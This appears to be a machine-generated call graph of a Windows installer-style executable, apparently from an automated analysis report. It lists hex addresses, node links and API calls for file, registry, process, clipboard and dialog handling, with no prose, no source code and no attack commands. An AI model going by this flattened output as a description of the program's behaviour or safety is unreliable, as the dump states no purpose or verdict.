EmptyClipboard GlobalAlloc GlobalLock 3750->3751 3753 405a24 SendMessageW 3751->3753 3753->3753 3754 405a4d GlobalUnlock SetClipboardData CloseClipboard 3753->3754 3754->3727 3755->3716 3756->3745 3757->3717 3759 404479 3758->3759 3760 40447f SendMessageW 3758->3760 3759->3760 3760->3720 3761 4028de 3762 4028e6 3761->3762 3763 4028ea FindNextFileW 3762->3763 3766 4028fc 3762->3766 3764 402943 3763->3764 3763->3766 3767 40653d lstrcpynW 3764->3767 3767->3766 3768 404ce0 3769 404cf0 3768->3769 3770 404d0c 3768->3770 3779 405b81 GetDlgItemTextW 3769->3779 3772 404d12 SHGetPathFromIDListW 3770->3772 3773 404d3f 3770->3773 3775 404d22 3772->3775 3778 404d29 SendMessageW 3772->3778 3774 404cfd SendMessageW 3774->3770 3777 40140b 2 API calls 3775->3777 3777->3778 3778->3773 3779->3774 3780 401563 3781 402ba4 3780->3781 3784 406484 wsprintfW 3781->3784 3783 402ba9 3784->3783 3785 401968 3786 402d84 17 API calls 3785->3786 3787 40196f 3786->3787 3788 402d84 17 API calls 3787->3788 3789 40197c 3788->3789 3790 402da6 17 API calls 3789->3790 3791 401993 lstrlenW 3790->3791 3792 4019a4 3791->3792 3796 4019e5 3792->3796 3797 40653d lstrcpynW 3792->3797 3794 4019d5 3795 4019da lstrlenW 3794->3795 3794->3796 3795->3796 3797->3794 3798 40166a 3799 402da6 17 API calls 3798->3799 3800 401670 3799->3800 3801 406873 2 API calls 3800->3801 3802 401676 3801->3802 3803 402aeb 3804 402d84 17 API calls 3803->3804 3805 402af1 3804->3805 3806 40657a 17 API calls 3805->3806 3807 40292e 3805->3807 3806->3807 3808 4026ec 3809 402d84 17 API calls 3808->3809 3816 4026fb 3809->3816 3810 402838 3811 402745 ReadFile 3811->3810 3811->3816 3812 4060b0 ReadFile 3812->3816 3814 402785 MultiByteToWideChar 3814->3816 3815 40283a 3830 406484 wsprintfW 3815->3830 3816->3810 3816->3811 3816->3812 3816->3814 3816->3815 3818 4027ab SetFilePointer MultiByteToWideChar 3816->3818 3819 40284b 3816->3819 3821 40610e SetFilePointer 3816->3821 3818->3816 3819->3810 3820 40286c SetFilePointer 3819->3820 3820->3810 3822 40612a 3821->3822 3825 406142 3821->3825 3823 4060b0 ReadFile 3822->3823 3824 406136 3823->3824 3824->3825 3826 406173 SetFilePointer 3824->3826 3827 40614b SetFilePointer 3824->3827 3825->3816 3826->3825 3827->3826 3828 406156 3827->3828 3829 4060df WriteFile 3828->3829 3829->3825 3830->3810 3452 40176f 3453 402da6 17 API calls 3452->3453 3454 401776 3453->3454 3455 401796 3454->3455 3456 40179e 3454->3456 3492 40653d lstrcpynW 3455->3492 3493 40653d lstrcpynW 3456->3493 3459 40179c 3463 4067c4 5 API calls 3459->3463 3460 4017a9 3461 405e0c 3 API calls 3460->3461 3462 4017af lstrcatW 3461->3462 3462->3459 3479 4017bb 3463->3479 3464 4017c1 3465 406873 2 API calls 3464->3465 3468 4017cd CompareFileTime 3464->3468 3464->3479 3465->3464 3466 406008 2 API calls 3466->3479 3468->3464 3469 40188d 3471 40559f 24 API calls 3469->3471 3470 401864 3472 40559f 24 API calls 3470->3472 3481 401879 3470->3481 3473 401897 3471->3473 3472->3481 3474 4032b4 31 API calls 3473->3474 3475 4018aa 3474->3475 3476 4018be SetFileTime 3475->3476 3477 4018d0 FindCloseChangeNotification 3475->3477 3476->3477 3480 4018e1 3477->3480 3477->3481 3478 40657a 17 API calls 3478->3479 3479->3464 3479->3466 3479->3469 3479->3470 3479->3478 3482 40653d lstrcpynW 3479->3482 3487 405b9d MessageBoxIndirectW 3479->3487 3491 40602d GetFileAttributesW CreateFileW 3479->3491 3483 4018e6 3480->3483 3484 4018f9 3480->3484 3482->3479 3485 40657a 17 API calls 3483->3485 3486 40657a 17 API calls 3484->3486 3488 4018ee lstrcatW 3485->3488 3489 401901 3486->3489 3487->3479 3488->3489 3490 405b9d MessageBoxIndirectW 3489->3490 3490->3481 3491->3479 3492->3459 3493->3460 3831 401a72 3832 402d84 17 API calls 3831->3832 3833 401a7b 3832->3833 3834 402d84 17 API calls 3833->3834 3835 401a20 3834->3835 3836 401573 3837 401583 ShowWindow 3836->3837 3838 40158c 3836->3838 3837->3838 3839 402c2a 3838->3839 3840 40159a ShowWindow 3838->3840 3840->3839 3841 4023f4 3842 402da6 17 API calls 3841->3842 3843 402403 3842->3843 3844 402da6 17 API calls 3843->3844 3845 40240c 3844->3845 3846 402da6 17 API calls 3845->3846 3847 402416 GetPrivateProfileStringW 3846->3847 3848 4014f5 SetForegroundWindow 3849 402c2a 3848->3849 3850 401ff6 3851 402da6 17 API calls 3850->3851 3852 401ffd 3851->3852 3853 406873 2 API calls 3852->3853 3854 402003 3853->3854 3856 402014 3854->3856 3857 406484 wsprintfW 3854->3857 3857->3856 3858 401b77 3859 402da6 17 API calls 3858->3859 3860 401b7e 3859->3860 3861 402d84 17 API calls 3860->3861 3862 401b87 wsprintfW 3861->3862 3863 402c2a 3862->3863 3864 40167b 3865 402da6 17 API calls 3864->3865 3866 401682 3865->3866 3867 402da6 17 API calls 3866->3867 3868 40168b 3867->3868 3869 402da6 17 API calls 3868->3869 3870 401694 MoveFileW 3869->3870 3871 4016a7 3870->3871 3877 4016a0 3870->3877 3873 406873 2 API calls 3871->3873 3875 4022f6 3871->3875 3872 401423 24 API calls 3872->3875 3874 4016b6 3873->3874 3874->3875 3876 4062fd 36 API calls 3874->3876 3876->3877 3877->3872 3878 4019ff 3879 402da6 17 API calls 3878->3879 3880 401a06 3879->3880 3881 402da6 17 API calls 3880->3881 3882 401a0f 3881->3882 3883 401a16 lstrcmpiW 3882->3883 3884 401a28 lstrcmpW 3882->3884 3885 401a1c 3883->3885 3884->3885 3886 4022ff 3887 402da6 17 API calls 3886->3887 3888 402305 3887->3888 3889 402da6 17 API calls 3888->3889 3890 40230e 3889->3890 3891 402da6 17 API calls 3890->3891 3892 402317 3891->3892 3893 406873 2 API calls 3892->3893 3894 402320 3893->3894 3895 402331 lstrlenW lstrlenW 3894->3895 3899 402324 3894->3899 3896 40559f 24 API calls 3895->3896 3898 40236f SHFileOperationW 3896->3898 3897 40559f 24 API calls 3900 40232c 3897->3900 3898->3899 3898->3900 3899->3897 3899->3900 3901 401000 3902 401037 BeginPaint GetClientRect 3901->3902 3903 40100c DefWindowProcW 3901->3903 3905 4010f3 3902->3905 3908 401179 3903->3908 3906 401073 CreateBrushIndirect FillRect DeleteObject 3905->3906 3907 4010fc 3905->3907 3906->3905 3909 401102 CreateFontIndirectW 3907->3909 3910 401167 EndPaint 3907->3910 3909->3910 3911 401112 6 API calls 3909->3911 3910->3908 3911->3910 3912 401d81 3913 401d94 GetDlgItem 3912->3913 3914 401d87 3912->3914 3916 401d8e 3913->3916 3915 402d84 17 API calls 3914->3915 3915->3916 3917 402da6 17 API calls 3916->3917 3920 401dd5 GetClientRect LoadImageW SendMessageW 3916->3920 3917->3920 3919 401e33 3921 401e38 DeleteObject 3919->3921 3922 401e3f 3919->3922 3920->3919 3920->3922 3921->3922 3923 401503 3924 40150b 3923->3924 3926 40151e 3923->3926 3925 402d84 17 API calls 3924->3925 3925->3926 3927 402383 3928 40238a 3927->3928 3931 40239d 3927->3931 3929 40657a 17 API calls 3928->3929 3930 402397 3929->3930 3932 405b9d MessageBoxIndirectW 3930->3932 3932->3931 3933 402c05 SendMessageW 3934 402c2a 3933->3934 3935 402c1f InvalidateRect 3933->3935 3935->3934 3936 404f06 GetDlgItem GetDlgItem 3937 404f58 7 API calls 3936->3937 3943 40517d 3936->3943 3938 404ff2 SendMessageW 3937->3938 3939 404fff DeleteObject 3937->3939 3938->3939 3940 405008 3939->3940 3941 40503f 3940->3941 3944 40657a 17 API calls 3940->3944 3945 404499 18 API calls 3941->3945 3942 40525f 3946 40530b 3942->3946 3956 4052b8 SendMessageW 3942->3956 3976 405170 3942->3976 3943->3942 3947 4051ec 3943->3947 3990 404e54 SendMessageW 3943->3990 3950 405021 SendMessageW SendMessageW 3944->3950 3951 405053 3945->3951 3948 405315 SendMessageW 3946->3948 3949 40531d 3946->3949 3947->3942 3952 405251 SendMessageW 3947->3952 3948->3949 3958 405336 3949->3958 3959 40532f ImageList_Destroy 3949->3959 3974 405346 3949->3974 3950->3940 3955 404499 18 API calls 3951->3955 3952->3942 3953 404500 8 API calls 3957 40550c 3953->3957 3969 405064 3955->3969 3961 4052cd SendMessageW 3956->3961 3956->3976 3962 40533f GlobalFree 3958->3962 3958->3974 3959->3958 3960 4054c0 3965 4054d2 ShowWindow GetDlgItem ShowWindow 3960->3965 3960->3976 3964 4052e0 3961->3964 3962->3974 3963 40513f GetWindowLongW SetWindowLongW 3966 405158 3963->3966 3975 4052f1 SendMessageW 3964->3975 3965->3976 3967 405175 3966->3967 3968 40515d ShowWindow 3966->3968 3989 4044ce SendMessageW 3967->3989 3988 4044ce SendMessageW 3968->3988 3969->3963 3970 40513a 3969->3970 3973 4050b7 SendMessageW 3969->3973 3977 4050f5 SendMessageW 3969->3977 3978 405109 SendMessageW 3969->3978 3970->3963 3970->3966 3973->3969 3974->3960 3981 405381 3974->3981 3995 404ed4 3974->3995 3975->3946 3976->3953 3977->3969 3978->3969 3980 40548b 3982 405496 InvalidateRect 3980->3982 3985 4054a2 3980->3985 3983 4053af SendMessageW 3981->3983 3984 4053c5 3981->3984 3982->3985 3983->3984 3984->3980 3986 405439 SendMessageW SendMessageW 3984->3986 3985->3960 4004 404e0f 3985->4004 3986->3984 3988->3976 3989->3943 3991 404eb3 SendMessageW 3990->3991 3992 404e77 GetMessagePos ScreenToClient SendMessageW 3990->3992 3994 404eab 3991->3994 3993 404eb0 3992->3993 3992->3994 3993->3991 3994->3947 4007 40653d lstrcpynW 3995->4007 3997 404ee7 4008 406484 wsprintfW 3997->4008 3999 404ef1 4000 40140b 2 API calls 3999->4000 4001 404efa 4000->4001 4009 40653d lstrcpynW 4001->4009 4003 404f01 4003->3981 4010 404d46 4004->4010 4006 404e24 4006->3960 4007->3997 4008->3999 4009->4003 4011 404d5f 4010->4011 4012 40657a 17 API calls 4011->4012 4013 404dc3 4012->4013 4014 40657a 17 API calls 4013->4014 4015 404dce 4014->4015 4016 40657a 17 API calls 4015->4016 4017 404de4 lstrlenW wsprintfW SetDlgItemTextW 4016->4017 4017->4006 3177 401389 3179 401390 3177->3179 3178 4013fe 3179->3178 3180 4013cb MulDiv SendMessageW 3179->3180 3180->3179 4018 404609 lstrlenW 4019 404628 4018->4019 4020 40462a WideCharToMultiByte 4018->4020 4019->4020 4021 40498a 4022 4049b6 4021->4022 4023 4049c7 4021->4023 4082 405b81 GetDlgItemTextW 4022->4082 4025 4049d3 GetDlgItem 4023->4025 4031 404a32 4023->4031 4027 4049e7 4025->4027 4026 4049c1 4029 4067c4 5 API calls 4026->4029 4030 4049fb SetWindowTextW 4027->4030 4035 405eb7 4 API calls 4027->4035 4028 404b16 4032 404cc5 4028->4032 4084 405b81 GetDlgItemTextW 4028->4084 4029->4023 4036 404499 18 API calls 4030->4036 4031->4028 4031->4032 4037 40657a 17 API calls 4031->4037 4034 404500 8 API calls 4032->4034 4039 404cd9 4034->4039 4040 4049f1 4035->4040 4041 404a17 4036->4041 4042 404aa6 SHBrowseForFolderW 4037->4042 4038 404b46 4043 405f14 18 API calls 4038->4043 4040->4030 4049 405e0c 3 API calls 4040->4049 4044 404499 18 API calls 4041->4044 4042->4028 4045 404abe CoTaskMemFree 4042->4045 4046 404b4c 4043->4046 4047 404a25 4044->4047 4048 405e0c 3 API calls 4045->4048 4085 40653d lstrcpynW 4046->4085 4083 4044ce SendMessageW 4047->4083 4051 404acb 4048->4051 4049->4030 4054 404b02 SetDlgItemTextW 4051->4054 4058 40657a 17 API calls 4051->4058 4053 404a2b 4056 40690a 5 API calls 4053->4056 4054->4028 4055 404b63 4057 40690a 5 API calls 4055->4057 4056->4031 4065 404b6a 4057->4065 4059 404aea lstrcmpiW 4058->4059 4059->4054 4062 404afb lstrcatW 4059->4062 4060 404bab 4086 40653d lstrcpynW 4060->4086 4062->4054 4063 404bb2 4064 405eb7 4 API calls 4063->4064 4066 404bb8 GetDiskFreeSpaceW 4064->4066 4065->4060 4069 405e58 2 API calls 4065->4069 4071 404c03 4065->4071 4068 404bdc MulDiv 4066->4068 4066->4071 4068->4071 4069->4065 4070 404c74 4073 404c97 4070->4073 4075 40140b 2 API calls 4070->4075 4071->4070 4072 404e0f 20 API calls 4071->4072 4074 404c61 4072->4074 4087 4044bb EnableWindow 4073->4087 4076 404c76 SetDlgItemTextW 4074->4076 4077 404c66 4074->4077 4075->4073 4076->4070 4080 404d46 20 API calls 4077->4080 4079 404cb3 4079->4032 4081 4048e3 SendMessageW 4079->4081 4080->4070 4081->4032 4082->4026 4083->4053 4084->4038 4085->4055 4086->4063 4087->4079 4088 40248a 4089 402da6 17 API calls 4088->4089 4090 40249c 4089->4090 4091 402da6 17 API calls 4090->4091 4092 4024a6 4091->4092 4105 402e36 4092->4105 4095 40292e 4096 4024de 4098 4024ea 4096->4098 4100 402d84 17 API calls 4096->4100 4097 402da6 17 API calls 4099 4024d4 lstrlenW 4097->4099 4101 402509 RegSetValueExW 4098->4101 4102 4032b4 31 API calls 4098->4102 4099->4096 4100->4098 4103 40251f RegCloseKey 4101->4103 4102->4101 4103->4095 4106 402e51 4105->4106 4109 4063d8 4106->4109 4110 4063e7 4109->4110 4111 4063f2 RegCreateKeyExW 4110->4111 4112 4024b6 4110->4112 4111->4112 4112->4095 4112->4096 4112->4097 4113 40290b 4114 402da6 17 API calls 4113->4114 4115 402912 FindFirstFileW 4114->4115 4116 40293a 4115->4116 4119 402925 4115->4119 4121 406484 wsprintfW 4116->4121 4118 402943 4122 40653d lstrcpynW 4118->4122 4121->4118 4122->4119 4123 40190c 4124 401943 4123->4124 4125 402da6 17 API calls 4124->4125 4126 401948 4125->4126 4127 405c49 67 API calls 4126->4127 4128 401951 4127->4128 4129 40190f 4130 402da6 17 API calls 4129->4130 4131 401916 4130->4131 4132 405b9d MessageBoxIndirectW 4131->4132 4133 40191f 4132->4133 4134 401491 4135 40559f 24 API calls 4134->4135 4136 401498 4135->4136 4137 402891 4138 402898 4137->4138 4140 402ba9 4137->4140 4139 402d84 17 API calls 4138->4139 4141 40289f 4139->4141 4142 4028ae SetFilePointer 4141->4142 4142->4140 4143 4028be 4142->4143 4145 406484 wsprintfW 4143->4145 4145->4140 3021 403b12 3022 403b2a 3021->3022 3023 403b1c CloseHandle 3021->3023 3028 403b57 3022->3028 3023->3022 3030 403b65 3028->3030 3029 403b2f 3032 405c49 3029->3032 3030->3029 3031 403b6a FreeLibrary GlobalFree 3030->3031 3031->3029 3031->3031 3068 405f14 3032->3068 3035 405c71 DeleteFileW 3066 403b3b 3035->3066 3036 405c88 3037 405da8 3036->3037 3083 40653d lstrcpynW 3036->3083 3037->3066 3101 406873 FindFirstFileW 3037->3101 3039 405cae 3040 405cc1 3039->3040 3041 405cb4 lstrcatW 3039->3041 3084 405e58 lstrlenW 3040->3084 3043 405cc7 3041->3043 3045 405cd7 lstrcatW 3043->3045 3047 405ce2 lstrlenW FindFirstFileW 3043->3047 3045->3047 3047->3037 3059 405d04 3047->3059 3050 405d8b FindNextFileW 3054 405da1 FindClose 3050->3054 3050->3059 3051 405c01 5 API calls 3053 405de3 3051->3053 3055 405de7 3053->3055 3056 405dfd 3053->3056 3054->3037 3060 40559f 24 API calls 3055->3060 3055->3066 3058 40559f 24 API calls 3056->3058 3058->3066 3059->3050 3061 405c49 60 API calls 3059->3061 3063 40559f 24 API calls 3059->3063 3065 40559f 24 API calls 3059->3065 3088 40653d lstrcpynW 3059->3088 3089 405c01 3059->3089 3097 4062fd MoveFileExW 3059->3097 3062 405df4 3060->3062 3061->3059 3064 4062fd 36 API calls 3062->3064 3063->3050 3064->3066 3065->3059 3107 40653d lstrcpynW 3068->3107 3070 405f25 3071 405eb7 4 API calls 3070->3071 3072 405f2b 3071->3072 3073 405c69 3072->3073 3074 4067c4 5 API calls 3072->3074 3073->3035 3073->3036 3075 405f3b 3074->3075 3075->3073 3080 405f52 3075->3080 3076 405f6c lstrlenW 3077 405f77 3076->3077 3076->3080 3079 405e0c 3 API calls 3077->3079 3078 406873 2 API calls 3078->3080 3081 405f7c GetFileAttributesW 3079->3081 3080->3073 3080->3076 3080->3078 3082 405e58 2 API calls 3080->3082 3081->3073 3082->3076 3083->3039 3085 405e66 3084->3085 3086 405e78 3085->3086 3087 405e6c CharPrevW 3085->3087 3086->3043 3087->3085 3087->3086 3088->3059 3108 406008 GetFileAttributesW 3089->3108 3092 405c2e 3092->3059 3093 405c24 DeleteFileW 3095 405c2a 3093->3095 3094 405c1c RemoveDirectoryW 3094->3095 3095->3092 3096 405c3a SetFileAttributesW 3095->3096 3096->3092 3098 40631e 3097->3098 3099 406311 3097->3099 3098->3059 3111 406183 3099->3111 3102 405dcd 3101->3102 3103 406889 FindClose 3101->3103 3102->3066 3104 405e0c lstrlenW CharPrevW 3102->3104 3103->3102 3105 405dd7 3104->3105 3106 405e28 lstrcatW 3104->3106 3105->3051 3106->3105 3107->3070 3109 405c0d 3108->3109 3110 40601a SetFileAttributesW 3108->3110 3109->3092 3109->3093 3109->3094 3110->3109 3112 4061b3 3111->3112 3113 4061d9 GetShortPathNameW 3111->3113 3138 40602d GetFileAttributesW CreateFileW 3112->3138 3114 4062f8 3113->3114 3115 4061ee 3113->3115 3114->3098 3115->3114 3118 4061f6 wsprintfA 3115->3118 3117 4061bd CloseHandle GetShortPathNameW 3117->3114 3119 4061d1 3117->3119 3120 40657a 17 API calls 3118->3120 3119->3113 3119->3114 3121 40621e 3120->3121 3139 40602d GetFileAttributesW CreateFileW 3121->3139 3123 40622b 3123->3114 3124 40623a GetFileSize GlobalAlloc 3123->3124 3125 4062f1 CloseHandle 3124->3125 3126 40625c 3124->3126 3125->3114 3140 4060b0 ReadFile 3126->3140 3131 40627b lstrcpyA 3134 40629d 3131->3134 3132 40628f 3133 405f92 4 API calls 3132->3133 3133->3134 3135 4062d4 SetFilePointer 3134->3135 3147 4060df WriteFile 3135->3147 3138->3117 3139->3123 3141 4060ce 3140->3141 3141->3125 3142 405f92 lstrlenA 3141->3142 3143 405fd3 lstrlenA 3142->3143 3144 405fdb 3143->3144 3145 405fac lstrcmpiA 3143->3145 3144->3131 3144->3132 3145->3144 3146 405fca CharNextA 3145->3146 3146->3143 3148 4060fd GlobalFree 3147->3148 3148->3125 4146 401f12 4147 402da6 17 API calls 4146->4147 4148 401f18 4147->4148 4149 402da6 17 API calls 4148->4149 4150 401f21 4149->4150 4151 402da6 17 API calls 4150->4151 4152 401f2a 4151->4152 4153 402da6 17 API calls 4152->4153 4154 401f33 4153->4154 4155 401423 24 API calls 4154->4155 4156 401f3a 4155->4156 4163 405b63 ShellExecuteExW 4156->4163 4158 401f82 4159 40292e 4158->4159 4160 4069b5 5 API calls 4158->4160 4161 401f9f CloseHandle 4160->4161 4161->4159 4163->4158 4164 405513 4165 405523 4164->4165 4166 405537 4164->4166 4167 405580 4165->4167 4168 405529 4165->4168 4169 40553f IsWindowVisible 4166->4169 4175 405556 4166->4175 4170 405585 CallWindowProcW 4167->4170 4171 4044e5 SendMessageW 4168->4171 4169->4167 4172 40554c 4169->4172 4173 405533 4170->4173 4171->4173 4174 404e54 5 API calls 4172->4174 4174->4175 4175->4170 4176 404ed4 4 API calls 4175->4176 4176->4167 4177 402f93 4178 402fa5 SetTimer 4177->4178 4179 402fbe 4177->4179 4178->4179 4180 403013 4179->4180 4181 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4179->4181 4181->4180 4182 401d17 4183 402d84 17 API calls 4182->4183 4184 401d1d IsWindow 4183->4184 4185 401a20 4184->4185 4186 403f9a 4187 403fb2 4186->4187 4188 404113 4186->4188 4187->4188 4189 403fbe 4187->4189 4190 404164 4188->4190 4191 404124 GetDlgItem GetDlgItem 4188->4191 4192 403fc9 SetWindowPos 4189->4192 4193 403fdc 4189->4193 4195 4041be 4190->4195 4206 401389 2 API calls 4190->4206 4194 404499 18 API calls 4191->4194 4192->4193 4197 403fe5 ShowWindow 4193->4197 4198 404027 4193->4198 4199 40414e SetClassLongW 4194->4199 4196 4044e5 SendMessageW 4195->4196 4200 40410e 4195->4200 4228 4041d0 4196->4228 4201 4040d1 4197->4201 4202 404005 GetWindowLongW 4197->4202 4203 404046 4198->4203 4204 40402f DestroyWindow 4198->4204 4205 40140b 2 API calls 4199->4205 4207 404500 8 API calls 4201->4207 4202->4201 4208 40401e ShowWindow 4202->4208 4210 40404b SetWindowLongW 4203->4210 4211 40405c 4203->4211 4209 404422 4204->4209 4205->4190 4212 404196 4206->4212 4207->4200 4208->4198 4209->4200 4217 404453 ShowWindow 4209->4217 4210->4200 4211->4201 4215 404068 GetDlgItem 4211->4215 4212->4195 4216 40419a SendMessageW 4212->4216 4213 40140b 2 API calls 4213->4228 4214 404424 DestroyWindow EndDialog 4214->4209 4218 404096 4215->4218 4219 404079 SendMessageW IsWindowEnabled 4215->4219 4216->4200 4217->4200 4221 4040a3 4218->4221 4222 4040ea SendMessageW 4218->4222 4223 4040b6 4218->4223 4231 40409b 4218->4231 4219->4200 4219->4218 4220 40657a 17 API calls 4220->4228 4221->4222 4221->4231 4222->4201 4226 4040d3 4223->4226 4227 4040be 4223->4227 4224 404472 SendMessageW 4224->4201 4225 404499 18 API calls 4225->4228 4230 40140b 2 API calls 4226->4230 4229 40140b 2 API calls 4227->4229 4228->4200 4228->4213 4228->4214 4228->4220 4228->4225 4232 404499 18 API calls 4228->4232 4248 404364 DestroyWindow 4228->4248 4229->4231 4230->4231 4231->4201 4231->4224 4233 40424b GetDlgItem 4232->4233 4234 404260 4233->4234 4235 404268 ShowWindow EnableWindow 4233->4235 4234->4235 4257 4044bb EnableWindow 4235->4257 4237 404292 EnableWindow 4242 4042a6 4237->4242 4238 4042ab GetSystemMenu EnableMenuItem SendMessageW 4239 4042db SendMessageW 4238->4239 4238->4242 4239->4242 4241 403f7b 18 API calls 4241->4242 4242->4238 4242->4241 4258 4044ce SendMessageW 4242->4258 4259 40653d lstrcpynW 4242->4259 4244 40430a lstrlenW 4245 40657a 17 API calls 4244->4245 4246 404320 SetWindowTextW 4245->4246 4247 401389 2 API calls 4246->4247 4247->4228 4248->4209 4249 40437e CreateDialogParamW 4248->4249 4249->4209 4250 4043b1 4249->4250 4251 404499 18 API calls 4250->4251 4252 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4251->4252 4253 401389 2 API calls 4252->4253 4254 404402 4253->4254 4254->4200 4255 40440a ShowWindow 4254->4255 4256 4044e5 SendMessageW 4255->4256 4256->4209 4257->4237 4258->4242 4259->4244 4260 401b9b 4261 401ba8 4260->4261 4262 401bec 4260->4262 4265 401c31 4261->4265 4270 401bbf 4261->4270 4263 401bf1 4262->4263 4264 401c16 GlobalAlloc 4262->4264 4276 40239d 4263->4276 4281 40653d lstrcpynW 4263->4281 4267 40657a 17 API calls 4264->4267 4266 40657a 17 API calls 4265->4266 4265->4276 4268 402397 4266->4268 4267->4265 4273 405b9d MessageBoxIndirectW 4268->4273 4279 40653d lstrcpynW 4270->4279 4271 401c03 GlobalFree 4271->4276 4273->4276 4274 401bce 4280 40653d lstrcpynW 4274->4280 4277 401bdd 4282 40653d lstrcpynW 4277->4282 4279->4274 4280->4277 4281->4271 4282->4276 4283 40261c 4284 402da6 17 API calls 4283->4284 4285 402623 4284->4285 4288 40602d GetFileAttributesW CreateFileW 4285->4288 4287 40262f 4288->4287 4289 40149e 4290 4014ac PostQuitMessage 4289->4290 4291 40239d 4289->4291 4290->4291 4292 40259e 4302 402de6 4292->4302 4295 402d84 17 API calls 4296 4025b1 4295->4296 4297 40292e 4296->4297 4298 4025d9 RegEnumValueW 4296->4298 4299 4025cd RegEnumKeyW 4296->4299 4300 4025ee RegCloseKey 4298->4300 4299->4300 4300->4297 4303 402da6 17 API calls 4302->4303 4304 402dfd 4303->4304 4305 4063aa RegOpenKeyExW 4304->4305 4306 4025a8 4305->4306 4306->4295 4307 4015a3 4308 402da6 17 API calls 4307->4308 4309 4015aa SetFileAttributesW 4308->4309 4310 4015bc 4309->4310 3149 401fa4 3150 402da6 17 API calls 3149->3150 3151 401faa 3150->3151 3152 40559f 24 API calls 3151->3152 3153 401fb4 3152->3153 3164 405b20 CreateProcessW 3153->3164 3156 401fdd CloseHandle 3159 40292e 3156->3159 3160 401fcf 3161 401fd4 3160->3161 3162 401fdf 3160->3162 3172 406484 wsprintfW 3161->3172 3162->3156 3165 405b53 CloseHandle 3164->3165 3166 401fba 3164->3166 3165->3166 3166->3156 3166->3159 3167 4069b5 WaitForSingleObject 3166->3167 3168 4069cf 3167->3168 3169 4069e1 GetExitCodeProcess 3168->3169 3173 406946 3168->3173 3169->3160 3172->3156 3174 406963 PeekMessageW 3173->3174 3175 406973 WaitForSingleObject 3174->3175 3176 406959 DispatchMessageW 3174->3176 3175->3168 3176->3174 4311 40202a 4312 402da6 17 API calls 4311->4312 4313 402031 4312->4313 4314 40690a 5 API calls 4313->4314 4315 402040 4314->4315 4316 40205c GlobalAlloc 4315->4316 4325 4020cc 4315->4325 4317 402070 4316->4317 4316->4325 4318 40690a 5 API calls 4317->4318 4319 402077 4318->4319 4320 40690a 5 API calls 4319->4320 4321 402081 4320->4321 4321->4325 4326 406484 wsprintfW 4321->4326 4323 4020ba 4327 406484 wsprintfW 4323->4327 4326->4323 4327->4325 4328 40252a 4329 402de6 17 API calls 4328->4329 4330 402534 4329->4330 4331 402da6 17 API calls 4330->4331 4332 40253d 4331->4332 4333 402548 RegQueryValueExW 4332->4333 4334 40292e 4332->4334 4335 402568 4333->4335 4338 40256e RegCloseKey 4333->4338 4335->4338 4339 406484 wsprintfW 4335->4339 4338->4334 4339->4338 4340 4021aa 4341 402da6 17 API calls 4340->4341 4342 4021b1 4341->4342 4343 402da6 17 API calls 4342->4343 4344 4021bb 4343->4344 4345 402da6 17 API calls 4344->4345 4346 4021c5 4345->4346 4347 402da6 17 API calls 4346->4347 4348 4021cf 4347->4348 4349 402da6 17 API calls 4348->4349 4350 4021d9 4349->4350 4351 402218 CoCreateInstance 4350->4351 4352 402da6 17 API calls 4350->4352 4355 402237 4351->4355 4352->4351 4353 401423 24 API calls 4354 4022f6 4353->4354 4355->4353 4355->4354 4356 403baa 4357 403bb5 4356->4357 4358 403bbc GlobalAlloc 4357->4358 4359 403bb9 4357->4359 4358->4359 3181 40352d SetErrorMode GetVersionExW 3182 4035b7 3181->3182 3183 40357f GetVersionExW 3181->3183 3184 403610 3182->3184 3185 40690a 5 API calls 3182->3185 3183->3182 3186 40689a 3 API calls 3184->3186 3185->3184 3187 403626 lstrlenA 3186->3187 3187->3184 3188 403636 3187->3188 3189 40690a 5 API calls 3188->3189 3190 40363d 3189->3190 3191 40690a 5 API calls 3190->3191 3192 403644 3191->3192 3193 40690a 5 API calls 3192->3193 3197 403650 #17 OleInitialize SHGetFileInfoW 3193->3197 3196 40369d GetCommandLineW 3272 40653d lstrcpynW 3196->3272 3271 40653d lstrcpynW 3197->3271 3199 4036af 3200 405e39 CharNextW 3199->3200 3201 4036d5 CharNextW 3200->3201 3213 4036e6 3201->3213 3202 4037e4 3203 4037f8 GetTempPathW 3202->3203 3273 4034fc 3203->3273 3205 403810 3207 403814 GetWindowsDirectoryW lstrcatW 3205->3207 3208 40386a DeleteFileW 3205->3208 3206 405e39 CharNextW 3206->3213 3209 4034fc 12 API calls 3207->3209 3283 40307d GetTickCount GetModuleFileNameW 3208->3283 3211 403830 3209->3211 3211->3208 3214 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3211->3214 3212 40387d 3216 403a59 ExitProcess OleUninitialize 3212->3216 3218 403932 3212->3218 3226 405e39 CharNextW 3212->3226 3213->3202 3213->3206 3215 4037e6 3213->3215 3217 4034fc 12 API calls 3214->3217 3368 40653d lstrcpynW 3215->3368 3220 403a69 3216->3220 3221 403a7e 3216->3221 3225 403862 3217->3225 3311 403bec 3218->3311 3373 405b9d 3220->3373 3223 403a86 GetCurrentProcess OpenProcessToken 3221->3223 3224 403afc ExitProcess 3221->3224 3229 403acc 3223->3229 3230 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3223->3230 3225->3208 3225->3216 3240 40389f 3226->3240 3233 40690a 5 API calls 3229->3233 3230->3229 3231 403941 3231->3216 3236 403ad3 3233->3236 3234 403908 3237 405f14 18 API calls 3234->3237 3235 403949 3239 405b08 5 API calls 3235->3239 3238 403ae8 ExitWindowsEx 3236->3238 3242 403af5 3236->3242 3241 403914 3237->3241 3238->3224 3238->3242 3243 40394e lstrcatW 3239->3243 3240->3234 3240->3235 3241->3216 3369 40653d lstrcpynW 3241->3369 3377 40140b 3242->3377 3244 40396a lstrcatW lstrcmpiW 3243->3244 3245 40395f lstrcatW 3243->3245 3244->3231 3247 40398a 3244->3247 3245->3244 3249 403996 3247->3249 3250 40398f 3247->3250 3253 405aeb 2 API calls 3249->3253 3252 405a6e 4 API calls 3250->3252 3251 403927 3370 40653d lstrcpynW 3251->3370 3255 403994 3252->3255 3256 40399b SetCurrentDirectoryW 3253->3256 3255->3256 3257 4039b8 3256->3257 3258 4039ad 3256->3258 3372 40653d lstrcpynW 3257->3372 3371 40653d lstrcpynW 3258->3371 3261 40657a 17 API calls 3262 4039fa DeleteFileW 3261->3262 3263 403a06 CopyFileW 3262->3263 3268 4039c5 3262->3268 3263->3268 3264 403a50 3266 4062fd 36 API calls 3264->3266 3265 4062fd 36 API calls 3265->3268 3266->3231 3267 40657a 17 API calls 3267->3268 3268->3261 3268->3264 